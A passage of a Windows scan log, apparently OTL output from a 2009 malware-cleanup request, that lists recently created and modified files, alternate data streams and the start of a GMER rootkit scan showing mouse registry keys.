header.php -> %UserProfile%\Desktop\header.php -> [2009/01/26 23:44:22 | 00,002,568 | ---- | C] ()
connections-reloaded.2.1.zip -> %UserProfile%\Desktop\connections-reloaded.2.1.zip -> [2009/01/26 23:31:34 | 00,089,849 | ---- | C] ()
train.png -> %UserProfile%\Desktop\train.png -> [2009/01/26 23:18:42 | 00,001,295 | ---- | C] ()
functions.php -> %UserProfile%\Desktop\functions.php -> [2009/01/26 23:05:33 | 00,004,083 | ---- | C] ()
Web Copy-revised.3doc.doc -> %UserProfile%\Desktop\Web Copy-revised.3doc.doc -> [2009/01/25 11:16:17 | 00,314,880 | ---- | C] ()
Folder.jpg -> %UserProfile%\Desktop\Folder.jpg -> [2009/01/22 16:13:21 | 00,010,420 | -HS- | C] ()
AlbumArtSmall.jpg -> %UserProfile%\Desktop\AlbumArtSmall.jpg -> [2009/01/22 16:13:21 | 00,002,526 | -HS- | C] ()
CLASH-PROJECT.cwp -> %UserProfile%\Desktop\CLASH-PROJECT.cwp -> [2009/01/21 08:51:21 | 00,039,522 | ---- | C] ()
clash-should-I-stay-excerpt.mp3 -> %UserProfile%\Desktop\clash-should-I-stay-excerpt.mp3 -> [2009/01/21 08:46:10 | 01,296,822 | ---- | C] ()
03 - Should I Stay Or Should I Go.mp3 -> %UserProfile%\Desktop\03 - Should I Stay Or Should I Go.mp3 -> [2009/01/21 08:36:40 | 05,729,368 | ---- | C] ()
sqmdata15.sqm -> %SystemDrive%\sqmdata15.sqm -> [2009/01/21 02:10:53 | 00,000,268 | -H-- | C] ()
sqmnoopt15.sqm -> %SystemDrive%\sqmnoopt15.sqm -> [2009/01/21 02:10:53 | 00,000,244 | -H-- | C] ()
silkscreen -> %UserProfile%\Desktop\silkscreen -> [2009/01/19 20:02:47 | 00,000,000 | ---D | C]
silkscreen.zip -> %UserProfile%\Desktop\silkscreen.zip -> [2009/01/18 20:55:23 | 00,023,289 | ---- | C] ()
logo.png -> %UserProfile%\Desktop\logo.png -> [2009/01/18 08:24:34 | 00,008,788 | ---- | C] ()
Aguilar-benefit2.eps -> %UserProfile%\Desktop\Aguilar-benefit2.eps -> [2009/01/17 15:04:25 | 06,219,430 | ---- | C] ()
Aguilar-benefit.pdf -> %UserProfile%\Desktop\Aguilar-benefit.pdf -> [2009/01/17 14:44:30 | 03,502,921 | ---- | C] ()
WIT-Gallery -> %UserProfile%\Desktop\WIT-Gallery -> [2009/01/16 22:31:52 | 00,000,000 | ---D | C]
[Files/Folders - Modified Within 30 Days]
5 C:\WINDOWS\System32\*.tmp files -> C:\WINDOWS\System32\*.tmp ->
6 C:\WINDOWS\*.tmp files -> C:\WINDOWS\*.tmp ->
2 C:\Documents and Settings\David\My Documents\*.tmp files -> C:\Documents and Settings\David\My Documents\*.tmp ->
3 C:\Documents and Settings\David\Desktop\*.tmp files -> C:\Documents and Settings\David\Desktop\*.tmp ->
45 C:\Documents and Settings\David\Local Settings\temp\jkos-David\binaries\*.tmp files -> C:\Documents and Settings\David\Local Settings\temp\jkos-David\binaries\*.tmp ->
45 C:\Documents and Settings\David\Local Settings\temp\jkos-David\binaries\*.tmp files -> C:\Documents and Settings\David\Local Settings\temp\jkos-David\binaries\*.tmp ->
1 C:\WINDOWS\Temp\*.tmp files -> C:\WINDOWS\Temp\*.tmp ->
AloPort.sys -> %SystemRoot%\System32\drivers\AloPort.sys -> [2099/01/01 12:00:00 | 00,003,087 | ---- | M] ()
OTScanIt2.exe -> %UserProfile%\Desktop\OTScanIt2.exe -> [2009/02/13 08:15:47 | 00,656,714 | ---- | M] ()
User_Feed_Synchronization-{262578A8-0CC7-4369-953F-800F1B773610}.job -> %SystemRoot%\tasks\User_Feed_Synchronization-{262578A8-0CC7-4369-953F-800F1B773610}.job -> [2009/02/13 08:15:00 | 00,000,422 | -H-- | M] ()
User_Feed_Synchronization-{2A50439D-5D8A-4C95-B940-18961C5CA924}.job -> %SystemRoot%\tasks\User_Feed_Synchronization-{2A50439D-5D8A-4C95-B940-18961C5CA924}.job -> [2009/02/13 08:15:00 | 00,000,392 | -H-- | M] ()
GoogleUpdateTaskMachine.job -> %SystemRoot%\tasks\GoogleUpdateTaskMachine.job -> [2009/02/13 00:29:10 | 00,000,882 | ---- | M] ()
GoogleUpdateTaskUserS-1-5-21-1275210071-796845957-839522115-1010.job -> %SystemRoot%\tasks\GoogleUpdateTaskUserS-1-5-21-1275210071-796845957-839522115-1010.job -> [2009/02/13 00:29:09 | 00,000,958 | ---- | M] ()
GoogleUpdateTaskUserS-1-5-21-1275210071-796845957-839522115-1004.job -> %SystemRoot%\tasks\GoogleUpdateTaskUserS-1-5-21-1275210071-796845957-839522115-1004.job -> [2009/02/13 00:29:09 | 00,000,926 | ---- | M] ()
Google Software Updater.job -> %SystemRoot%\tasks\Google Software Updater.job -> [2009/02/12 23:32:32 | 00,000,868 | ---- | M] ()
perf.dat -> %UserProfile%\Local Settings\temp\OnlineScanner\Anti-Virus\perf.dat -> [2009/02/12 16:01:15 | 00,000,128 | ---- | M] ()
fssm32.exe -> %UserProfile%\Local Settings\temp\OnlineScanner\updates\fsav_beta\fssm32.exe -> [2009/02/12 15:26:10 | 00,519,816 | ---- | M] (F-Secure Corp.)
fssm32.exe -> %UserProfile%\Local Settings\temp\OnlineScanner\Anti-Virus\fssm32.exe -> [2009/02/12 15:26:10 | 00,519,816 | ---- | M] (F-Secure Corp.)
fm4av.dll -> %UserProfile%\Local Settings\temp\OnlineScanner\updates\fsav_beta\fm4av.dll -> [2009/02/12 15:26:10 | 00,482,448 | ---- | M] ()
fm4av.dll -> %UserProfile%\Local Settings\temp\OnlineScanner\Anti-Virus\fm4av.dll -> [2009/02/12 15:26:10 | 00,482,448 | ---- | M] ()
fsgk32.exe -> %UserProfile%\Local Settings\temp\OnlineScanner\updates\fsav_beta\fsgk32.exe -> [2009/02/12 15:26:10 | 00,440,448 | ---- | M] (F-Secure Corp.)
fsgk32.exe -> %UserProfile%\Local Settings\temp\OnlineScanner\Anti-Virus\fsgk32.exe -> [2009/02/12 15:26:10 | 00,440,448 | ---- | M] (F-Secure Corp.)
AVPFPI0.dll -> %UserProfile%\Local Settings\temp\OnlineScanner\updates\fsav_beta\AVPFPI0.dll -> [2009/02/12 15:26:10 | 00,154,304 | ---- | M] (Kaspersky Lab)
AVPFPI0.dll -> %UserProfile%\Local Settings\temp\OnlineScanner\Anti-Virus\AVPFPI0.dll -> [2009/02/12 15:26:10 | 00,154,304 | ---- | M] (Kaspersky Lab)
fsepx32.dll -> %UserProfile%\Local Settings\temp\OnlineScanner\updates\fsav_beta\fsepx32.dll -> [2009/02/12 15:26:10 | 00,150,144 | ---- | M] (F-Secure Corporation)
fsepx32.dll -> %UserProfile%\Local Settings\temp\OnlineScanner\Anti-Virus\fsepx32.dll -> [2009/02/12 15:26:10 | 00,150,144 | ---- | M] (F-Secure Corporation)
fpinor.dll -> %UserProfile%\Local Settings\temp\OnlineScanner\updates\fsav_beta\fpinor.dll -> [2009/02/12 15:26:10 | 00,120,456 | ---- | M] (F-Secure Corporation)
fpinor.dll -> %UserProfile%\Local Settings\temp\OnlineScanner\Anti-Virus\fpinor.dll -> [2009/02/12 15:26:10 | 00,120,456 | ---- | M] (F-Secure Corporation)
fsuss.dll -> %UserProfile%\Local Settings\temp\OnlineScanner\updates\fsav_beta\fsuss.dll -> [2009/02/12 15:26:10 | 00,113,288 | ---- | M] (F-Secure Corporation)
fsuss.dll -> %UserProfile%\Local Settings\temp\OnlineScanner\Anti-Virus\fsuss.dll -> [2009/02/12 15:26:10 | 00,113,288 | ---- | M] (F-Secure Corporation)
fsgkiapi.dll -> %UserProfile%\Local Settings\temp\OnlineScanner\updates\fsav_beta\fsgkiapi.dll -> [2009/02/12 15:26:10 | 00,100,456 | ---- | M] (F-Secure Corp.)
fsgkiapi.dll -> %UserProfile%\Local Settings\temp\OnlineScanner\Anti-Virus\fsgkiapi.dll -> [2009/02/12 15:26:10 | 00,100,456 | ---- | M] (F-Secure Corp.)
avpproxy.dll -> %UserProfile%\Local Settings\temp\OnlineScanner\updates\fsav_beta\avpproxy.dll -> [2009/02/12 15:26:10 | 00,084,672 | ---- | M] (F-Secure Corporation)
avpproxy.dll -> %UserProfile%\Local Settings\temp\OnlineScanner\Anti-Virus\avpproxy.dll -> [2009/02/12 15:26:10 | 00,084,672 | ---- | M] (F-Secure Corporation)
fsbl.dll -> %UserProfile%\Local Settings\temp\OnlineScanner\updates\fsav_beta\fsbl.dll -> [2009/02/12 15:26:10 | 00,068,224 | ---- | M] (F-Secure Corporation)
fsbl.dll -> %UserProfile%\Local Settings\temp\OnlineScanner\Anti-Virus\fsbl.dll -> [2009/02/12 15:26:10 | 00,068,224 | ---- | M] (F-Secure Corporation)
fsusscr.dll -> %UserProfile%\Local Settings\temp\OnlineScanner\updates\mlcwin\fsusscr.dll -> [2009/02/12 15:25:56 | 00,928,392 | ---- | M] (F-Secure Corporation)
fsusscr.dll -> %UserProfile%\Local Settings\temp\OnlineScanner\Anti-Virus\fsusscr.dll -> [2009/02/12 15:25:56 | 00,928,392 | ---- | M] (F-Secure Corporation)
fsmart.dll -> %UserProfile%\Local Settings\temp\OnlineScanner\updates\mlcwin\fsmart.dll -> [2009/02/12 15:25:56 | 00,147,456 | ---- | M] (F-Secure Corporation)
fsmart.dll -> %UserProfile%\Local Settings\temp\OnlineScanner\Anti-Virus\fsmart.dll -> [2009/02/12 15:25:56 | 00,147,456 | ---- | M] (F-Secure Corporation)
fsedb.dat -> %UserProfile%\Local Settings\temp\OnlineScanner\updates\hydrawin\fsedb.dat -> [2009/02/12 15:25:48 | 02,242,162 | ---- | M] ()
fsedb.dat -> %UserProfile%\Local Settings\temp\OnlineScanner\Anti-Virus\fsedb.dat -> [2009/02/12 15:25:48 | 02,242,162 | ---- | M] ()
fsecr32.dll -> %UserProfile%\Local Settings\temp\OnlineScanner\updates\hydrawin\fsecr32.dll -> [2009/02/12 15:25:48 | 01,079,944 | ---- | M] (F-Secure Corporation)
fsecr32.dll -> %UserProfile%\Local Settings\temp\OnlineScanner\Anti-Virus\fsecr32.dll -> [2009/02/12 15:25:48 | 01,079,944 | ---- | M] (F-Secure Corporation)
fsupdllb.dat -> %UserProfile%\Local Settings\temp\OnlineScanner\updates\hydrawin\fsupdllb.dat -> [2009/02/12 15:25:48 | 00,422,594 | ---- | M] ()
fsupdllb.dat -> %UserProfile%\Local Settings\temp\OnlineScanner\Anti-Virus\fsupdllb.dat -> [2009/02/12 15:25:48 | 00,422,594 | ---- | M] ()
fsblu.dll -> %UserProfile%\Local Settings\temp\OnlineScanner\updates\ols_bl\fsblu.dll -> [2009/02/12 15:25:18 | 00,731,784 | ---- | M] (F-Secure Corporation)
fsbld.dll -> %UserProfile%\Local Settings\temp\OnlineScanner\Anti-Virus\fsbld.dll -> [2009/02/12 15:25:18 | 00,731,784 | ---- | M] (F-Secure Corporation)
fssubmit.dll -> %UserProfile%\Local Settings\temp\OnlineScanner\updates\ols_33_bin\fssubmit.dll -> [2009/02/12 15:25:14 | 00,651,264 | ---- | M] (F-Secure Corporation)
fssubmit.dll -> %UserProfile%\Local Settings\temp\OnlineScanner\Anti-Virus\fssubmit.dll -> [2009/02/12 15:25:14 | 00,651,264 | ---- | M] (F-Secure Corporation)
Nse_w32.dll -> %UserProfile%\Local Settings\temp\OnlineScanner\updates\ols_30_pegdb\Nse_w32.dll -> [2009/02/12 15:25:09 | 00,588,856 | ---- | M] (Norman ASA)
Nse_w32.dll -> %UserProfile%\Local Settings\temp\OnlineScanner\Anti-Virus\Nse_w32.dll -> [2009/02/12 15:25:09 | 00,588,856 | ---- | M] (Norman ASA)
sai.dat -> %UserProfile%\Local Settings\temp\OnlineScanner\updates\avmisc\sai.dat -> [2009/02/12 15:24:50 | 00,001,348 | ---- | M] ()
sai.dat -> %UserProfile%\Local Settings\temp\OnlineScanner\Anti-Virus\sai.dat -> [2009/02/12 15:24:50 | 00,001,348 | ---- | M] ()
ext.dat -> %UserProfile%\Local Settings\temp\OnlineScanner\updates\avmisc\ext.dat -> [2009/02/12 15:24:50 | 00,000,449 | ---- | M] ()
ext.dat -> %UserProfile%\Local Settings\temp\OnlineScanner\Anti-Virus\ext.dat -> [2009/02/12 15:24:50 | 00,000,449 | ---- | M] ()
sae.dat -> %UserProfile%\Local Settings\temp\OnlineScanner\updates\avmisc\sae.dat -> [2009/02/12 15:24:50 | 00,000,243 | ---- | M] ()
sae.dat -> %UserProfile%\Local Settings\temp\OnlineScanner\Anti-Virus\sae.dat -> [2009/02/12 15:24:50 | 00,000,243 | ---- | M] ()
sfdb.dat -> %UserProfile%\Local Settings\temp\jkos-David\engine\bases\sfdb.dat -> [2009/02/12 13:58:04 | 00,000,084 | ---- | M] ()
prremote.dll -> %UserProfile%\Local Settings\temp\jkos-David\binaries\prremote.dll -> [2009/02/12 13:57:37 | 00,090,112 | ---- | M] (Kaspersky Lab)
msvcr80.dll -> %UserProfile%\Local Settings\temp\jkos-David\binaries\msvcr80.dll -> [2009/02/12 13:57:36 | 00,626,688 | ---- | M] (Microsoft Corporation)
msvcp80.dll -> %UserProfile%\Local Settings\temp\jkos-David\binaries\msvcp80.dll -> [2009/02/12 13:57:36 | 00,548,864 | ---- | M] (Microsoft Corporation)
ikave.dll -> %UserProfile%\Local Settings\temp\jkos-David\binaries\ikave.dll -> [2009/02/12 13:57:35 | 00,065,536 | ---- | M] ()
msvcm80.dll -> %UserProfile%\Local Settings\temp\jkos-David\binaries\msvcm80.dll -> [2009/02/12 13:57:30 | 00,479,232 | ---- | M] (Microsoft Corporation)
User_Feed_Synchronization-{9D5DE8E1-A15F-4186-BFF7-B3EC781BA0FD}.job -> %SystemRoot%\tasks\User_Feed_Synchronization-{9D5DE8E1-A15F-4186-BFF7-B3EC781BA0FD}.job -> [2009/02/12 13:46:35 | 00,000,438 | -H-- | M] ()
kosglue-7.0.25.0.dll -> %UserProfile%\Local Settings\temp\jkos-David\binaries\kosglue-7.0.25.0.dll -> [2009/02/12 12:08:25 | 00,729,152 | ---- | M] (Kaspersky Lab)
kave.dll -> %UserProfile%\Local Settings\temp\jkos-David\binaries\kave.dll -> [2009/02/12 12:08:24 | 00,282,624 | ---- | M] (Kaspersky Lab.)
prLoader.dll -> %UserProfile%\Local Settings\temp\jkos-David\binaries\prLoader.dll -> [2009/02/12 12:08:24 | 00,184,320 | ---- | M] (Kaspersky Lab)
ScanningProcess.exe -> %UserProfile%\Local Settings\temp\jkos-David\binaries\ScanningProcess.exe -> [2009/02/12 12:08:24 | 00,139,264 | ---- | M] (Kaspersky Lab.)
FSSync.dll -> %UserProfile%\Local Settings\temp\jkos-David\binaries\FSSync.dll -> [2009/02/12 12:08:23 | 00,038,400 | ---- | M] (Kaspersky Lab)
ntuser.dat -> %UserProfile%\ntuser.dat -> [2009/02/12 11:34:22 | 16,777,216 | ---- | M] ()
Perflib_Perfdata_128c.dat -> %SystemRoot%\Temp\Perflib_Perfdata_128c.dat -> [2009/02/12 11:20:30 | 00,016,384 | ---- | M] ()
SpyBotPosts.url -> %UserProfile%\Desktop\SpyBotPosts.url -> [2009/02/12 08:29:05 | 00,000,137 | ---- | M] ()
qmgr1.dat -> %AllUsersProfile%\Application Data\Microsoft\Network\Downloader\qmgr1.dat -> [2009/02/12 02:14:06 | 00,007,336 | ---- | M] ()
qmgr0.dat -> %AllUsersProfile%\Application Data\Microsoft\Network\Downloader\qmgr0.dat -> [2009/02/12 02:14:05 | 00,008,941 | ---- | M] ()
New Microsoft Word Document.doc -> %UserProfile%\Desktop\New Microsoft Word Document.doc -> [2009/02/11 16:53:52 | 00,010,752 | ---- | M] ()
Spybot - Search & Destroy - Scheduled Task.job -> %SystemRoot%\tasks\Spybot - Search & Destroy - Scheduled Task.job -> [2009/02/11 12:00:00 | 00,000,328 | ---- | M] ()
nvapps.xml -> %SystemRoot%\System32\nvapps.xml -> [2009/02/11 11:09:59 | 00,177,348 | ---- | M] ()
wpa.dbl -> %SystemRoot%\System32\wpa.dbl -> [2009/02/11 11:09:49 | 00,012,598 | ---- | M] ()
mbamswissarmy.sys -> %SystemRoot%\System32\drivers\mbamswissarmy.sys -> [2009/02/11 10:19:42 | 00,038,496 | ---- | M] (Malwarebytes Corporation)
mbam.sys -> %SystemRoot%\System32\drivers\mbam.sys -> [2009/02/11 10:19:34 | 00,015,504 | ---- | M] (Malwarebytes Corporation)
Config.MPF -> %SystemRoot%\System32\Config.MPF -> [2009/02/11 09:32:33 | 00,064,589 | ---- | M] ()
SA.DAT -> %SystemRoot%\tasks\SA.DAT -> [2009/02/11 03:10:51 | 00,000,006 | -H-- | M] ()
bootstat.dat -> %SystemRoot%\bootstat.dat -> [2009/02/11 03:10:44 | 00,002,048 | --S- | M] ()
hiberfil.sys -> %SystemDrive%\hiberfil.sys -> [2009/02/11 03:10:42 | 21,470,12608 | -HS- | M] ()
ntuser.ini -> %UserProfile%\ntuser.ini -> [2009/02/11 03:09:07 | 00,000,278 | -HS- | M] ()
imsins.BAK -> %SystemRoot%\imsins.BAK -> [2009/02/11 03:01:57 | 00,001,374 | ---- | M] ()
system.ini -> %SystemRoot%\system.ini -> [2009/02/10 23:04:16 | 00,000,292 | ---- | M] ()
hosts -> %SystemRoot%\System32\drivers\etc\hosts -> [2009/02/10 23:03:22 | 00,000,027 | ---- | M] ()
boot.ini -> %SystemDrive%\boot.ini -> [2009/02/10 22:45:52 | 00,000,281 | RHS- | M] ()
Google Earth.lnk -> %AllUsersProfile%\Desktop\Google Earth.lnk -> [2009/02/10 21:42:13 | 00,001,836 | ---- | M] ()
win.ini -> %SystemRoot%\win.ini -> [2009/02/10 19:54:54 | 00,000,685 | ---- | M] ()
Boot.bak -> %SystemDrive%\Boot.bak -> [2009/02/10 19:54:54 | 00,000,211 | ---- | M] ()
AntiVir PE Classic.lnk -> %AllUsersProfile%\Desktop\AntiVir PE Classic.lnk -> [2009/02/10 19:46:32 | 00,001,851 | ---- | M] ()
msvcp71.dll -> %SystemRoot%\System32\msvcp71.dll -> [2009/02/09 15:15:00 | 00,499,712 | ---- | M] (Microsoft Corporation)
msvcr71.dll -> %SystemRoot%\System32\msvcr71.dll -> [2009/02/09 15:15:00 | 00,348,160 | ---- | M] (Microsoft Corporation)
Google Updater.exe -> %UserProfile%\Desktop\Google Updater.exe -> [2009/02/08 10:55:56 | 01,038,992 | ---- | M] ()
ntuser.bak -> %UserProfile%\ntuser.bak -> [2009/02/08 01:34:42 | 16,252,928 | ---- | M] ()
oueg.sys -> %SystemRoot%\System32\drivers\oueg.sys -> [2009/02/08 01:29:50 | 00,061,440 | ---- | M] ()
GDIPFONTCACHEV1.DAT -> %AppData%\GDIPFONTCACHEV1.DAT -> [2009/02/08 00:30:40 | 00,085,120 | ---- | M] ()
ERUNT AutoBackup.lnk -> %UserProfile%\Start Menu\Programs\Startup\ERUNT AutoBackup.lnk -> [2009/02/07 01:49:02 | 00,000,767 | ---- | M] ()
NTREGOPT.lnk -> %UserProfile%\Desktop\NTREGOPT.lnk -> [2009/02/07 01:48:57 | 00,000,611 | ---- | M] ()
ERUNT.lnk -> %UserProfile%\Desktop\ERUNT.lnk -> [2009/02/07 01:48:57 | 00,000,592 | ---- | M] ()
Malwarebytes' Anti-Malware.lnk -> %AllUsersProfile%\Desktop\Malwarebytes' Anti-Malware.lnk -> [2009/02/07 01:05:41 | 00,000,696 | ---- | M] ()
HijackThis.lnk -> %UserProfile%\Desktop\HijackThis.lnk -> [2009/02/07 01:00:50 | 00,001,734 | ---- | M] ()
hosts.20090208-022224.backup -> %SystemRoot%\System32\drivers\etc\hosts.20090208-022224.backup -> [2009/02/06 20:12:07 | 00,293,508 | R--- | M] ()
hosts.20090206-201207.backup -> %SystemRoot%\System32\drivers\etc\hosts.20090206-201207.backup -> [2009/02/06 19:53:32 | 00,293,508 | R--- | M] ()
Prunnet.doc -> %UserProfile%\Desktop\Prunnet.doc -> [2009/02/06 18:51:58 | 00,026,624 | ---- | M] ()
~$runnet.doc -> %UserProfile%\Desktop\~$runnet.doc -> [2009/02/06 07:09:11 | 00,000,162 | -H-- | M] ()
CCleaner.lnk -> %UserProfile%\Desktop\CCleaner.lnk -> [2009/02/04 21:35:00 | 00,001,548 | ---- | M] ()
mlfcache.dat -> %SystemRoot%\System32\mlfcache.dat -> [2009/02/04 10:55:48 | 00,066,636 | -H-- | M] ()
Google Chrome.lnk -> %UserProfile%\Desktop\Google Chrome.lnk -> [2009/02/03 21:44:17 | 00,002,244 | ---- | M] ()
MRT.exe -> %SystemRoot%\System32\MRT.exe -> [2009/02/03 18:21:12 | 21,244,864 | ---- | M] (Microsoft Corporation)
Colors-restored.mp3 -> %UserProfile%\Desktop\Colors-restored.mp3 -> [2009/02/01 09:58:47 | 02,259,456 | ---- | M] ()
DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini -> %UserProfile%\Local Settings\Application Data\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini -> [2009/02/01 09:32:02 | 00,059,904 | ---- | M] ()
McQcTask.job -> %SystemRoot%\tasks\McQcTask.job -> [2009/02/01 01:00:52 | 00,000,352 | -H-- | M] ()
XAMPP Control Panel.lnk -> %UserProfile%\Desktop\XAMPP Control Panel.lnk -> [2009/01/31 21:04:33 | 00,000,357 | ---- | M] ()
xampp-win32-1.7.0-installer.exe -> %UserProfile%\Desktop\xampp-win32-1.7.0-installer.exe -> [2009/01/31 20:26:47 | 40,759,679 | ---- | M] ()
Menus you liked.doc -> %UserProfile%\Desktop\Menus you liked.doc -> [2009/01/31 05:44:19 | 00,024,576 | ---- | M] ()
Thumbs.db -> %UserProfile%\Desktop\Thumbs.db -> [2009/01/29 10:02:38 | 00,568,320 | -HS- | M] ()
Vintige-Bubble-Banner-1-27-.jpg -> %UserProfile%\Desktop\Vintige-Bubble-Banner-1-27-.jpg -> [2009/01/27 16:47:39 | 00,070,031 | ---- | M] ()
Bubbles-rpt.png -> %UserProfile%\Desktop\Bubbles-rpt.png -> [2009/01/27 16:32:28 | 00,051,865 | ---- | M] ()
Bubbles-rpt.psd -> %UserProfile%\Desktop\Bubbles-rpt.psd -> [2009/01/27 16:22:05 | 00,110,514 | ---- | M] ()
Bubbles.psd -> %UserProfile%\Desktop\Bubbles.psd -> [2009/01/27 16:16:41 | 00,112,812 | ---- | M] ()
header.php -> %UserProfile%\Desktop\header.php -> [2009/01/26 23:44:23 | 00,002,568 | ---- | M] ()
connections-reloaded.2.1.zip -> %UserProfile%\Desktop\connections-reloaded.2.1.zip -> [2009/01/26 23:31:35 | 00,089,849 | ---- | M] ()
train.png -> %UserProfile%\Desktop\train.png -> [2009/01/26 23:18:42 | 00,001,295 | ---- | M] ()
functions.php -> %UserProfile%\Desktop\functions.php -> [2009/01/26 23:05:34 | 00,004,083 | ---- | M] ()
Web Copy-revised.3doc.doc -> %UserProfile%\Desktop\Web Copy-revised.3doc.doc -> [2009/01/25 11:16:18 | 00,314,880 | ---- | M] ()
GDIPFONTCACHEV1.DAT -> %UserProfile%\Local Settings\Application Data\GDIPFONTCACHEV1.DAT -> [2009/01/25 11:09:44 | 00,085,120 | ---- | M] ()
NeroDigital.ini -> %SystemRoot%\NeroDigital.ini -> [2009/01/24 17:30:37 | 00,000,116 | ---- | M] ()
Folder.jpg -> %UserProfile%\Desktop\Folder.jpg -> [2009/01/22 16:13:21 | 00,010,420 | -HS- | M] ()
AlbumArtSmall.jpg -> %UserProfile%\Desktop\AlbumArtSmall.jpg -> [2009/01/22 16:13:21 | 00,002,526 | -HS- | M] ()
03 - Should I Stay Or Should I Go.mp3 -> %UserProfile%\Desktop\03 - Should I Stay Or Should I Go.mp3 -> [2009/01/21 08:55:47 | 05,729,368 | ---- | M] ()
CLASH-PROJECT.cwp -> %UserProfile%\Desktop\CLASH-PROJECT.cwp -> [2009/01/21 08:51:21 | 00,039,522 | ---- | M] ()
clash-should-I-stay-excerpt.mp3 -> %UserProfile%\Desktop\clash-should-I-stay-excerpt.mp3 -> [2009/01/21 08:46:30 | 01,296,822 | ---- | M] ()
FNTCACHE.DAT -> %SystemRoot%\System32\FNTCACHE.DAT -> [2009/01/21 07:47:25 | 00,311,584 | ---- | M] ()
sqmdata15.sqm -> %SystemDrive%\sqmdata15.sqm -> [2009/01/21 02:10:53 | 00,000,268 | -H-- | M] ()
sqmnoopt15.sqm -> %SystemDrive%\sqmnoopt15.sqm -> [2009/01/21 02:10:53 | 00,000,244 | -H-- | M] ()
silkscreen.zip -> %UserProfile%\Desktop\silkscreen.zip -> [2009/01/18 20:55:24 | 00,023,289 | ---- | M] ()
logo.png -> %UserProfile%\Desktop\logo.png -> [2009/01/18 08:24:38 | 00,008,788 | ---- | M] ()
Aguilar-benefit2.eps -> %UserProfile%\Desktop\Aguilar-benefit2.eps -> [2009/01/17 15:04:25 | 06,219,430 | ---- | M] ()
Aguilar-benefit.pdf -> %UserProfile%\Desktop\Aguilar-benefit.pdf -> [2009/01/17 14:44:30 | 03,502,921 | ---- | M] ()
Microsoft Expression Web .lnk -> %UserProfile%\Desktop\Microsoft Expression Web .lnk -> [2009/01/16 22:12:07 | 00,002,461 | ---- | M] ()
mshtml.dll -> %SystemRoot%\System32\mshtml.dll -> [2009/01/16 21:35:14 | 03,594,752 | ---- | M] (Microsoft Corporation)
mshtml.dll -> %SystemRoot%\System32\dllcache\mshtml.dll -> [2009/01/16 21:35:14 | 03,594,752 | ---- | M] (Microsoft Corporation)
hosts.20090206-195332.backup -> %SystemRoot%\System32\drivers\etc\hosts.20090206-195332.backup -> [2009/01/15 15:53:05 | 00,289,887 | R--- | M] ()
McDefragTask.job -> %SystemRoot%\tasks\McDefragTask.job -> [2009/01/15 01:57:09 | 00,000,264 | -H-- | M] ()
opa12.dat -> %AllUsersProfile%\Application Data\Microsoft\Office\Data\opa12.dat -> [2008/01/19 09:59:41 | 00,008,422 | ---- | M] ()
daas_s.dll -> %UserProfile%\Local Settings\temp\OnlineScanner\Anti-Virus\daas_s.dll -> [2008/01/11 14:45:50 | 00,495,616 | ---- | M] (F-Secure Corporation)
opa11.dat -> %AllUsersProfile%\Application Data\Microsoft\Office\Data\opa11.dat -> [2007/06/27 20:44:09 | 00,011,100 | ---- | M] ()
data.dat -> %AllUsersProfile%\Application Data\Microsoft\Office\Data\data.dat -> [2006/12/19 20:30:04 | 00,001,388 | ---- | M] ()
[Alternate Data Streams]
@Alternate Data Stream - 0 bytes -> %ProgramFiles%\Thumbs.db:encryptable
@Alternate Data Stream - 0 bytes -> %UserProfile%\Desktop\Thumbs.db:encryptable
@Alternate Data Stream - 0 bytes -> %UserProfile%\My Documents\Thumbs.db:encryptable
@Alternate Data Stream - 120 bytes -> %AllUsersProfile%\Application Data\TEMP:5C321E34
[CatchMe Rootkit Scan by GMER]
< Windows folder & sub-folders >
scanning hidden processes ...
scanning hidden services & system hive ...
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\ACPI\PNP0F13\3&13c0b0c5&0\Device Parameters]
"FirmwareIdentified"=dword:00000001
"Migrated"=dword:00000001
"EnableWheelDetection"=dword:00000002
"MouseDataQueueSize"=dword:00000064
"MouseResolution"=dword:00000003
"MouseSynchIn100ns"=dword:01312d00
"SampleRate"=dword:00000064
"WheelDetectionTimeout"=dword:000005dc
"MouseInitializePolled"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Enum\ACPI\PNP0F13\3&13c0b0c5&0\LogConf]
"BasicConfigVector"=hex(a):48,00,00,00,0f,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,..
"BootConfig"=hex(8):01,00,00,00,0f,00,00,00,00,00,00,00,01,00,01,00,01,00,00,00,02,..
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Enum\ACPI\PNP0F13\3&13c0b0c5&0\Device Parameters]
"FirmwareIdentified"=dword:00000001
"Migrated"=dword:00000001
"EnableWheelDetection"=dword:00000002
"MouseDataQueueSize"=dword:00000064
"MouseResolution"=dword:00000003
"MouseSynchIn100ns"=dword:01312d00
"SampleRate"=dword:00000064
"WheelDetectionTimeout"=dword:000005dc
"MouseInitializePolled"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Enum\ACPI\PNP0F13\3&13c0b0c5&0\LogConf]
"BasicConfigVector"=hex(a):48,00,00,00,0f,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,..
"BootConfig"=hex(8):01,00,00,00,0f,00,00,00,00,00,00,00,01,00,01,00,01,00,00,00,02,..
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\ACPI\PNP0F13\3&13c0b0c5&0\Device Parameters]
"FirmwareIdentified"=dword:00000001
"Migrated"=dword:00000001
"EnableWheelDetection"=dword:00000002
"MouseDataQueueSize"=dword:00000064
"MouseResolution"=dword:00000003
"MouseSynchIn100ns"=dword:01312d00
"SampleRate"=dword:00000064
"WheelDetectionTimeout"=dword:000005dc
"MouseInitializePolled"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\ACPI\PNP0F13\3&13c0b0c5&0\LogConf]
"BasicConfigVector"=hex(a):48,00,00,00,0f,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,..
"BootConfig"=hex(8):01,00,00,00,0f,00,00,00,00,00,00,00,01,00,01,00,01,00,00,00,02,..
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet005\Enum\ACPI\PNP0F13\3&13c0b0c5&0\Device Parameters]
"FirmwareIdentified"=dword:00000001
"Migrated"=dword:00000001
"EnableWheelDetection"=dword:00000002
"MouseDataQueueSize"=dword:00000064
"MouseResolution"=dword:00000003
